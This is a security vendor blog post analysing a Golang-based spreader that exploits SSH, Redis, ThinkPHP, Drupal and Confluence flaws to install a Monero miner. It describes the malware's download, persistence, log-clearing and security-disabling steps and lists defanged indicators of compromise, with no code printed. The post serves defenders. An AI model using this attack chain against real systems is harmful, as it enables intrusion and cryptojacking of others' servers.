• Trend Micro
  • About TrendLabs Security Intelligence Blog
Search:
  • Home
  • Categories
    • Ransomware
    • Vulnerabilities
    • Exploits
    • Targeted Attacks
    • Deep Web
    • Mobile
    • Internet of Things
    • Malware
    • Bad Sites
    • Spam
    • Botnets
    • Social
    • Open source
Home   »   Exploits   »   Golang-based Spreader Used in a Cryptocurrency-Mining Malware Campaign

Golang-based Spreader Used in a Cryptocurrency-Mining Malware Campaign

  • Posted on:June 28, 2019 at 5:01 am
  • Posted in:Exploits, Vulnerabilities
  • Author:
    Trend Micro
0

by Augusto Remillano II and Mark Vicente

We found a Golang-based spreader being used in a campaign that drops a cryptocurrency miner payload. Golang, or Go, is an open source programming language that has been recently associated with malware activity. Trend Micro has been detecting the use of the spreader since May and saw it again in a campaign this month.

The spreader used in this campaign scans for machines running vulnerable software to propagate. The campaign’s attack chain is detailed below.

Figure 1. The attack infection chain

Technical details

The Golang-based spreader
This malware looks for several entry points to spread to other systems. It not only uses the common SSH service, but also several exploits. It does this using the Golang-based spreader (which Trend Micro detects as Trojan.Linux.GOSCAN.BB) that scans for the following:

  • SSH
  • Misconfigured Redis server
  • ThinkPHP exploit
  • Drupal exploit
  • Atlassian Confluence server (CVE-2019-3396)

A snapshot of the spreader’s code (shown in Figure 2) shows that it scans for a Redis port.

Figure 2. Code showing the use of Redis

Aside from using misconfigured Redis ports, the malware can also infect servers through vulnerable web applications, particularly ThinkPHP and Drupal. The code in the image below shows that it scans for CVE-2019-3396, a vulnerability in Atlassian’s Confluence server that was previously seen being used to distribute a different cryptocurrency-mining malware.

Figure 3. Code showing the use of several vulnerabilities

And finally, it also propagates through SSH ports, as seen in the code snapshot below.

Figure 4. Code showing the use of SSH to propagate

Other components
Once the malware reaches the system, it will connect to Pastebin to download the dropper component (detected as Trojan.SH.SQUELL.CC). The dropper will then download and extract a TAR file from mysqli[.]tar[.]gz. The TAR file contains the miner payload, the Golang-based scanner, and other necessary components, enumerated below:

  • Configuration file for the miner components
  • Trojan.SH.SQUELL.CB that will execute the miner and scanner
  • The Golang-based spreader
  • The miner
  • File used to determine the malware’s installation status

Aside from executing the miner and the scanner, Trojan.SH.SQUELL.CB performs several other actions. It tries to infect other systems through SSH. It disables security tools and clears command history and logs. It also kills previously ongoing cryptocurrency mining activities (if there were any) by blocking network traffic, and killing their processes. For persistence, it installs itself as a service in the system. It also sets up a cron job that will download and execute the latest version of the malware from Pastebin. All these activities are shown in the code snapshots below.

Figure 5. Code showing the use of SSH to infect other systems

Figure 6. Code showing how the malware disables security tools

Figure 7. Code showing the command to clear history and logs

Figure 8. Code showing the malware eliminating other possibly installed miners in the system

Figure 9. Code showing the persistence mechanisms of the malware

Conclusion and security recommendations

This isn’t the first time a Golang-based script has been used for a campaign. As mentioned earlier we’ve been seeing the same Golang-based spreader since May, used also for a different cryptocurrency-mining malware. The Go programming language was also used in a data stealer malware earlier this year, as reported by Malwarebytes.

Go provides cybercriminals with easy cross-platform development, allowing them to infect both Linux and Windows machines. However, this characteristic is not unique to the programming language. Cybercriminals are possibly turning to Golang to make the analysis of their malware more difficult, as it’s not as commonly used for malware as compared to other languages.

Whatever the reason, users can take steps to reduce the effectivity of a similar campaign by strengthening their network security and defenses. Here are some steps users can take to defend against similar threats.

  • Applying the necessary patches and updates as soon as they become available
  • Being mindful of the methods attackers use to spread malware and tailor defenses against them
  • Changing system and device settings with security in mind to prevent unauthorized access

Trend Micro solutions

Trend Micro endpoint solutions such as the Trend Micro Smart Protection Suites and Worry-Free™ Business Security can protect users and businesses from threats such as cryptocurrency miners by detecting malicious files and blocking all related malicious URLs. Enterprises can also monitor all ports and network protocols for advanced threats with the Trend Micro Deep Discovery™ Inspector network appliance.

Trend Micro ™ Deep Discovery ™ Inspector protects customers from the mentioned exploits through these rules:

  • 2573: MINER – TCP (Request)
  • 2626: CVE-2018-7600 – Drupal Remote Code Execution – HTTP (Request)
  • 2786: ThinkPHP 5x Remote Code Execution – HTTP (Request)
  • 2887: CVE-2019-3396 – ATLASSIAN CONFLUENCE – HTTP (Request)

Indicators of compromise (IoCs):

URLs:

hxxps://pastebin[.]com/raw/xvfxprtb

hxxp://m[.]jianlistore[.]com/images/qrcode/1414297571.jpg

xmr[.]pool[.]minergate[.]com:45700

xmr-eu1[.]nanopool[.]org:14444

xmr-asia1[.]nanopool[.]org:14444

Wallet address:

489N5AAY5igKmcD7gfYxmg6GrGJEXy46HbX23XRTHe1JYiSg4yo9iwBW9XcoCKaJ9xXbwBVSndKerbMvZdwoHMb23QyAFtz

SHA256 Detection name
2acf625f3842a6dfebf3ffa1df565ec48837838bd503a3f6c5f46a7c6564c6c9 Coinminer.Linux.TOOLXMR.AC.component
53622ec8ed5381230734e4695be737ff804ccb3f0e3ba241dda24bb00f37bd4d Trojan.Linux.GOSCAN.BB
6c3c0cd32e9b78485c5acec11a3d44f7a72a06d90ba0f3bfc260ea9698028797 Trojan.Linux.GOSCAN.BB
84fb31603c05804c17a2c6747927c48f3ef7d03986a50ecc5efe5cf9c9d830f5 Coinminer.Linux.TOOLXMR.AC
9295b6b635cd6e33b8f5589d142d95f7cfcc48abde4193374433fa3a379f0c5a Trojan.SH.SQUELL.CC
9ea5a0e97e9ddcfce5b068426593de4f6e81fbddde50930c20eee74c779dd7e7 Coinminer.Linux.TOOLXMR.AC
eb3b284bcfce567d059f47df46a777d600499c413e86310c9a95ae8edc8f0156 Trojan.SH.SQUELL.CB

 

Learn how to protect Enterprises, Small Businesses, and Home Users from ransomware:
ENTERPRISE »
SMALL BUSINESS»
HOME»
Tags: coinminercryptocurrency minergolang

Security Predictions for 2020

  • Cybersecurity in 2020 will be viewed through many lenses — from differing attacker motivations and cybercriminal arsenal to technological developments and global threat intelligence — only so defenders can keep up with the broad range of threats.
    Read our security predictions for 2020.

Business Process Compromise

  • Attackers are starting to invest in long-term operations that target specific processes enterprises rely on. They scout for vulnerable practices, susceptible systems and operational loopholes that they can leverage or abuse. To learn more, read our Security 101: Business Process Compromise.

Recent Posts

  • Our New Blog
  • How Unsecure gRPC Implementations Can Compromise APIs, Applications
  • XCSSET Mac Malware: Infects Xcode Projects, Performs UXSS Attack on Safari, Other Browsers, Leverages Zero-day Exploits
  • August Patch Tuesday Fixes Critical IE, Important Windows Vulnerabilities Exploited in the Wild
  • Water Nue Phishing Campaign Targets C-Suite’s Office 365 Accounts

Popular Posts

Sorry. No data so far.

Stay Updated

  • Home and Home Office
  • |
  • For Business
  • |
  • Security Intelligence
  • |
  • About Trend Micro
  • Asia Pacific Region (APAC): Australia / New Zealand, 中国, 日本, 대한민국, 台灣
  • Latin America Region (LAR): Brasil, México
  • North America Region (NABU): United States, Canada
  • Europe, Middle East, & Africa Region (EMEA): France, Deutschland / Österreich / Schweiz, Italia, Россия, España, United Kingdom / Ireland
  • Privacy Statement
  • Legal Policies
  • Copyright © Trend Micro Incorporated. All rights reserved.